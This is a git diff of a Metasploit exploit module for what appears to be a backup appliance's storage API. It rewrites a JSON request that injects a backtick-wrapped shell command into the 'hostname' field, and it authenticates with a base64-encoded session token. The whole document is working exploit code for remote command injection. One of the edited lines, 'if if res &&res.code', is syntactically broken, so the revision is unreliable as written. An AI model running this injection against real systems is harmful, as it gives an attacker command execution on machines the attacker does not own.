Update ueb9_api_storage.rb
parent
8febde8291
commit
abc749e1e8
|
@ -67,7 +67,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
session = Base64.strict_encode64(session) #b64 encode session token
|
session = Base64.strict_encode64(session) #b64 encode session token
|
||||||
|
|
||||||
#substitue the cmd into the hostname parameter
|
#substitue the cmd into the hostname parameter
|
||||||
parms = "{\"type\":4,\"name\":\"_Stateless\",\"usage\":\"stateless\",\"build_filesystem\":1,\"properties\":{\"username\":\"aaaa\",\"password\":\"aaaa\",\"hostname\":\"`#{filter_bad_chars(cmd)}` &\",\"port\":\"2049\",\"protocol\":\"nfs\",\"share_name\":\"aaa\"}}"
|
parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`|
|
||||||
|
parms << filter_bad_chars(cmd)
|
||||||
|
parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}|
|
||||||
|
|
||||||
|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
|
@ -77,11 +79,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'encode_params' => false,
|
'encode_params' => false,
|
||||||
'data' => parms,
|
'data' => parms,
|
||||||
'headers' =>
|
'headers' =>
|
||||||
{'AuthToken' => session,}
|
{'AuthToken' => session,}
|
||||||
})
|
})
|
||||||
|
|
||||||
if res.code != 500
|
if if res &&res.code != 500
|
||||||
print_error("Unexpected response")
|
fail_with(Failure::UnexpectedReply,'Unexpected response')
|
||||||
end
|
end
|
||||||
rescue ::Rex::ConnectionError
|
rescue ::Rex::ConnectionError
|
||||||
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
|
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
|
||||||
|
|
Loading…
Reference in New Issue